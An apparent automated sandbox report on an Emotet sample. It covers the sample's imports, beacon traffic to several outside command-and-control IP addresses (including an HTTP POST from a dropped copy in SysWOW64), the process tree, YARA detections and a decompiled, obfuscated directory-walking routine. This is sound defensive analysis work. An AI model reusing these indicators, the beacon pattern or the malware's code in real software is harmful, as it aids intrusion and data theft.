USER32.dll	GetMenu, GetDlgItem, CharLowerA, DestroyWindow, ShowWindow, WinHelpA, DefFrameProcA, EnableMenuItem, GetParent, DefMDIChildProcA, EndDialog, CharUpperA, ReleaseDC, GetDC, SendMessageA, InvalidateRect, PostQuitMessage, SendDlgItemMessageA, wsprintfA, SetWindowPos, GetClientRect, SetScrollRange, SetScrollPos, LoadStringA, EndPaint, BeginPaint, DispatchMessageA, TranslateMessage, GetMessageA, CreateDialogParamA, UpdateWindow, CreateWindowExA, RegisterClassA, LoadCursorA, DialogBoxParamA, LoadIconA
GDI32.dll	CreatePalette, DeleteObject, SelectObject, RealizePalette, SelectPalette, SaveDC, SetWindowOrgEx, RestoreDC, LineTo, MoveToEx, DPtoLP, Rectangle, SetROP2, SetViewportExtEx, SetWindowExtEx, SetMapMode, CreatePen, GetStockObject, DeleteDC, BitBlt, CreateCompatibleDC, CreateDIBitmap
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA
MSVCP60.dll	?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ??1_Winit@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ, ??0Init@ios_base@std@@QAE@XZ
MSVCRT.dll	_except_handler3, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, _onexit, __dllonexit, sprintf, _ftol, strncpy, strncmp, calloc, memset, strcpy, strlen, strcmp, memcpy, malloc, __set_app_type, _controlfp

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 9, 2021 10:04:18.598702908 CEST	49742	80	192.168.2.5	102.182.145.130
Sep 9, 2021 10:04:18.794099092 CEST	80	49742	102.182.145.130	192.168.2.5
Sep 9, 2021 10:04:19.301563978 CEST	49742	80	192.168.2.5	102.182.145.130
Sep 9, 2021 10:04:19.497049093 CEST	80	49742	102.182.145.130	192.168.2.5
Sep 9, 2021 10:04:20.004699945 CEST	49742	80	192.168.2.5	102.182.145.130
Sep 9, 2021 10:04:20.199990034 CEST	80	49742	102.182.145.130	192.168.2.5
Sep 9, 2021 10:04:23.491902113 CEST	49743	80	192.168.2.5	173.173.254.105
Sep 9, 2021 10:04:26.505177021 CEST	49743	80	192.168.2.5	173.173.254.105
Sep 9, 2021 10:04:32.505817890 CEST	49743	80	192.168.2.5	173.173.254.105
Sep 9, 2021 10:04:47.996597052 CEST	49750	8080	192.168.2.5	64.207.182.168
Sep 9, 2021 10:04:51.007201910 CEST	49750	8080	192.168.2.5	64.207.182.168
Sep 9, 2021 10:04:57.007742882 CEST	49750	8080	192.168.2.5	64.207.182.168
Sep 9, 2021 10:05:12.886858940 CEST	49788	8080	192.168.2.5	51.89.199.141
Sep 9, 2021 10:05:15.993709087 CEST	49788	8080	192.168.2.5	51.89.199.141
Sep 9, 2021 10:05:21.995385885 CEST	49788	8080	192.168.2.5	51.89.199.141
Sep 9, 2021 10:05:36.914505959 CEST	49802	8080	192.168.2.5	167.114.153.111
Sep 9, 2021 10:05:39.917821884 CEST	49802	8080	192.168.2.5	167.114.153.111
Sep 9, 2021 10:05:45.918289900 CEST	49802	8080	192.168.2.5	167.114.153.111
Sep 9, 2021 10:06:00.886224031 CEST	49804	80	192.168.2.5	173.63.222.65
Sep 9, 2021 10:06:03.888497114 CEST	49804	80	192.168.2.5	173.63.222.65
Sep 9, 2021 10:06:09.904573917 CEST	49804	80	192.168.2.5	173.63.222.65
Sep 9, 2021 10:06:24.683176994 CEST	49806	80	192.168.2.5	218.147.193.146
Sep 9, 2021 10:06:27.671876907 CEST	49806	80	192.168.2.5	218.147.193.146
Sep 9, 2021 10:06:33.689837933 CEST	49806	80	192.168.2.5	218.147.193.146
Sep 9, 2021 10:06:48.279299974 CEST	49818	443	192.168.2.5	59.125.219.109
Sep 9, 2021 10:06:48.279340029 CEST	443	49818	59.125.219.109	192.168.2.5
Sep 9, 2021 10:06:48.279465914 CEST	49818	443	192.168.2.5	59.125.219.109
Sep 9, 2021 10:06:48.279891014 CEST	49818	443	192.168.2.5	59.125.219.109
Sep 9, 2021 10:06:48.279906988 CEST	443	49818	59.125.219.109	192.168.2.5
Sep 9, 2021 10:06:48.279964924 CEST	443	49818	59.125.219.109	192.168.2.5
Sep 9, 2021 10:06:48.279994011 CEST	49818	443	192.168.2.5	59.125.219.109
Sep 9, 2021 10:06:48.280013084 CEST	443	49818	59.125.219.109	192.168.2.5
Sep 9, 2021 10:06:51.499386072 CEST	49819	8080	192.168.2.5	172.104.97.173
Sep 9, 2021 10:06:54.504894972 CEST	49819	8080	192.168.2.5	172.104.97.173
Sep 9, 2021 10:07:00.505304098 CEST	49819	8080	192.168.2.5	172.104.97.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 9, 2021 10:03:56.617115974 CEST	65307	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:03:56.651897907 CEST	53	65307	8.8.8.8	192.168.2.5
Sep 9, 2021 10:03:59.244684935 CEST	64344	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:03:59.274605989 CEST	53	64344	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:05.732764006 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:05.772666931 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:07.248090982 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:07.283494949 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:14.538664103 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:14.574665070 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:14.721306086 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:14.758219957 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:25.177897930 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:25.222887993 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:29.330821037 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:29.367304087 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:47.566195011 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:47.619827032 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:51.334963083 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:51.364614010 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 9, 2021 10:04:55.133110046 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:04:55.164305925 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:05.657377005 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:05.701065063 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:06.132138014 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:06.158479929 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:09.268316031 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:09.302849054 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:12.934843063 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:12.962940931 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:20.675827026 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:20.711561918 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:32.083206892 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:32.115978956 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:32.455284119 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:32.482024908 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 9, 2021 10:05:37.947813034 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:05:37.977708101 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:01.959371090 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:01.999280930 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:26.854789019 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:26.890811920 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:35.928467989 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:35.966732979 CEST	53	57128	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:36.452368975 CEST	54791	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:36.484831095 CEST	53	54791	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:36.989121914 CEST	50463	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:37.036870956 CEST	53	50463	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:37.371404886 CEST	50394	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:37.406871080 CEST	53	50394	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:37.837129116 CEST	58530	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:37.870831966 CEST	53	58530	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:38.385723114 CEST	53813	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:38.421367884 CEST	53	53813	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:38.915987968 CEST	63732	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:38.971191883 CEST	53	63732	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:39.628633976 CEST	57344	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:39.670922041 CEST	53	57344	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:40.426983118 CEST	54450	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:40.454157114 CEST	53	54450	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:40.886326075 CEST	59261	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:40.920308113 CEST	53	59261	8.8.8.8	192.168.2.5
Sep 9, 2021 10:06:57.404654980 CEST	57151	53	192.168.2.5	8.8.8.8
Sep 9, 2021 10:06:57.437589884 CEST	53	57151	8.8.8.8	192.168.2.5

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 9, 2021 10:04:05.772666931 CEST	8.8.8.8	192.168.2.5	0x9f07	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

59.125.219.109

59.125.219.109:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49818	59.125.219.109	443	C:\Windows\SysWOW64\keyiso\mfnetsrc.exe

Timestamp	kBytes transferred	Direction	Data
Sep 9, 2021 10:06:48.279891014 CEST	10528	OUT	POST /VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 59.125.219.109/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----------------vX8jXrCzouVUfgwE User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 59.125.219.109:443 Content-Length: 4580 Cache-Control: no-cache

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: 0TOEtGJHN8.exe PID: 360 Parent PID: 5832

General

Start time:	10:04:03
Start date:	09/09/2021
Path:	C:\Users\user\Desktop\0TOEtGJHN8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\0TOEtGJHN8.exe'
Imagebase:	0x400000
File size:	364544 bytes
MD5 hash:	3639D17C4944743AC5C70C4E1BD30178
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.249411331.0000000002900000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.249721472.0000000002944000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 5900 Parent PID: 556

General

Start time:	10:04:04
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5044 Parent PID: 556

General

Start time:	10:04:04
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mfnetsrc.exe PID: 5116 Parent PID: 360

General

Start time:	10:04:06
Start date:	09/09/2021
Path:	C:\Windows\SysWOW64\keyiso\mfnetsrc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\keyiso\mfnetsrc.exe
Imagebase:	0x400000
File size:	364544 bytes
MD5 hash:	3639D17C4944743AC5C70C4E1BD30178
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.642790111.0000000002A34000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.642889433.0000000002AA1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.642626999.00000000029F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 6060 Parent PID: 556

General

Start time:	10:04:06
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6076 Parent PID: 556

General

Start time:	10:04:11
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5088 Parent PID: 556

General

Start time:	10:04:16
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3528 Parent PID: 556

General

Start time:	10:04:21
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4512 Parent PID: 556

General

Start time:	10:04:22
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4392 Parent PID: 556

General

Start time:	10:04:22
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: SgrmBroker.exe PID: 1284 Parent PID: 556

General

Start time:	10:04:23
Start date:	09/09/2021
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff7360f0000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1324 Parent PID: 556

General

Start time:	10:04:23
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5480 Parent PID: 556

General

Start time:	10:04:24
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6268 Parent PID: 556

General

Start time:	10:04:29
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6308 Parent PID: 556

General

Start time:	10:04:39
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: MpCmdRun.exe PID: 5864 Parent PID: 5480

General

Start time:	10:05:25
Start date:	09/09/2021
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Imagebase:	0x7ff74ef30000
File size:	455656 bytes
MD5 hash:	A267555174BFA53844371226F482B86B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 2592 Parent PID: 5864

General

Start time:	10:05:26
Start date:	09/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7024 Parent PID: 556

General

Start time:	10:06:33
Start date:	09/09/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 0TOEtGJHN8.exe PID: 360 Parent PID: 5832 0TOEtGJHN8.exeCOMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	98.9%
Signature Coverage:	15.3%
Total number of Nodes:	941
Total number of Limit Nodes:	50

Executed Functions

Function 02941030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(02944054,02944040), ref: 02941047
GetProcAddress.KERNEL32(00000000), ref: 0294104E

Part of subcall function 02941B30: SetLastError.KERNEL32(0000000D,?,02941070,?,00000040), ref: 02941B3D

SetLastError.KERNEL32(000000C1), ref: 02941096

Memory Dump Source

Source File: 00000000.00000002.249702328.0000000002941000.00000020.00000001.sdmp, Offset: 02941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2941000_0TOEtGJHN8.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 975761d0d68fde1fc72a81546917be734a21108835fa61916203086c749ee7d4
Instruction ID: 2413b6ea606ef45c7cfd2e2ab2ea1a3a59c01cb7605a0166206b1da565254c6d
Opcode Fuzzy Hash: 975761d0d68fde1fc72a81546917be734a21108835fa61916203086c749ee7d4
Instruction Fuzzy Hash: 06F1C9B4E00209EFDB04CF94D984FAEB7B5BF48304F208599E919AB341DB35EA91CB54

Uniqueness

Uniqueness Score: -1.00%

Function 029C38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E029C38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E029C34C0(0x29cd260);
											_t28 =  *0x29cdc60;
											if(_t28 == 0) {
												_t28 = E029C3E80(_t58, E029C3F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x29cdc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E029C38F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E029C3460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x29ce004 == 0) {
							 *0x29ce004 = E029C3E80(_t58, E029C3F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E029C34C0(0x29cd240);
							_t39 =  *0x29cdc60;
							if(_t39 == 0) {
								_t39 = E029C3E80(_t58, E029C3F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x29cdc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x29cdea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E029C3E80(_t58, E029C3F20(0xbb398380), 0x97f883e, _t97);
								 *0x29cdea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x29ce1a0;
							if(_t43 == 0) {
								_t43 = E029C3E80(_t58, E029C3F20(0xbb398380), 0x26c3f343, _t97);
								 *0x29ce1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x29cdfd4 == 0) {
									 *0x29cdfd4 = E029C3E80(_t58, E029C3F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x29ce064 == 0) {
										 *0x29ce064 = E029C3E80(_t58, E029C3F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x029c38fa
0x029c38fc
0x029c38fe
0x029c3902
0x029c3907
0x029c390b
0x029c3910
0x029c3910
0x029c3910
0x029c3910
0x029c3915
0x00000000
0x00000000
0x029c3a79
0x029c3b62
0x00000000
0x029c3a7f
0x029c3a84
0x00000000
0x029c3a8a
0x029c3a8f
0x029c3b48
0x029c3b51
0x029c3b58
0x029c3a95
0x029c3a9b
0x029c3abf
0x029c3ac1
0x00000000
0x029c3ac3
0x029c3acd
0x029c3acf
0x029c3ad6
0x029c3ae9
0x029c3aee
0x029c3aee
0x029c3b07
0x029c3b23
0x029c3b28
0x029c3b2d
0x029c3b32
0x029c3b32
0x029c3a9d
0x029c3a9d
0x029c3aa5
0x029c3ab5
0x029c3ab5
0x00000000
0x00000000
0x00000000
0x029c3aa5
0x029c3a9b
0x00000000
0x029c3a8f
0x029c3a84
0x00000000
0x029c3a79
0x029c391b
0x029c3a33
0x029c3a4b
0x029c3a4b
0x029c3a5d
0x029c3a5f
0x029c3a64
0x029c3b9d
0x029c3a6a
0x029c3a6a
0x00000000
0x029c3a6a
0x029c3921
0x029c3926
0x029c3992
0x029c3994
0x029c399b
0x029c39ae
0x029c39b3
0x029c39b3
0x029c39c7
0x029c39c9
0x029c39ce
0x029c39d3
0x029c39e6
0x029c39eb
0x029c39eb
0x029c39f2
0x029c39f4
0x029c39fb
0x029c3a0e
0x029c3a13
0x029c3a13
0x029c3a1c
0x029c3a1e
0x029c3a22
0x00000000
0x029c3928
0x029c392d
0x029c3953
0x029c396b
0x029c396b
0x029c3976
0x029c397a
0x029c3981
0x00000000
0x029c392f
0x029c3934
0x029c3b73
0x029c3b8b
0x029c3b8b
0x029c3b91
0x00000000
0x029c3b91
0x00000000
0x029c3934
0x029c392d
0x029c3926
0x00000000
0x029c393a
0x029c393a
0x029c394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,029C998D,16BF64F2,00000001), ref: 029C3976
